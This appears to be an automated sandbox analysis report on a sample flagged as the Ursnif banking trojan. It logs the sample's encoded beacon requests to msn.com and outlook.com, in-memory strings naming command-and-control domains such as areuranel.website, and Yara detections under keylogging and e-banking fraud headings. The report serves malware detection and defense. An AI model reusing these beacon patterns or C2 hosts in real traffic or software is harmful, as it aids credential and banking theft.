                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: f95b0919-28f4-47a7-648d-aec4a884b896Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6PR07CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COMX-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1X-FEServer: DB6PR07CA0023X-Powered-By: ASP.NETX-FEServer: AM5P194CA0003Date: Mon, 11 Oct 2021 22:51:28 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: PR3P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1X-FEServer: PR3P195CA0027X-Powered-By: ASP.NETX-FEServer: AM5P194CA0015Date: Mon, 11 Oct 2021 22:51:42 GMTConnection: close
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.538526774.0000000004C33000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000006.00000002.681813833.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/V
                      Source: loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2
                      Source: loaddll32.exe, 00000002.00000002.678292868.0000000000C70000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrc
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: rundll32.exe, 00000006.00000003.625046628.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/
                      Source: loaddll32.exe, 00000002.00000003.593466694.0000000000C84000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gw
                      Source: rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633992647&amp;rver
                      Source: rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633992660&amp;rver
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/H
                      Source: loaddll32.exe, 00000002.00000003.590802963.0000000000CD4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/&/
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com///
                      Source: rundll32.exe, 00000006.00000003.668405116.0000000003688000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.624862887.0000000003690000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZw
                      Source: loaddll32.exe, 00000002.00000003.593344627.0000000000CDA000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.593269471.0000000000CDC000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQ
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch&quot;
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534697625.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: loaddll32.exe, 00000002.00000002.678162514.0000000000C62000.00000004.00000020.sdmpString found in binary or memory: https://wweuranel.website/
                      Source: rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/7arS2
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fVn4JvoFId6Cp3NLYZ%2fukfCWWcxchPj%2fqCUcA7g4p8o%2fIzq
                      Source: rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fiPe0RJr3YRoIqgJZ%2fbp29G1GzQQlGJM_%2f2FuLuVprzaPw0SE
                      Source: loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch&quot;
                      Source: loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBB
                      Source: rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7Ct
                      Source: rundll32.exe, 00000006.00000003.624898872.000000000368B000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v
                      Source: loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
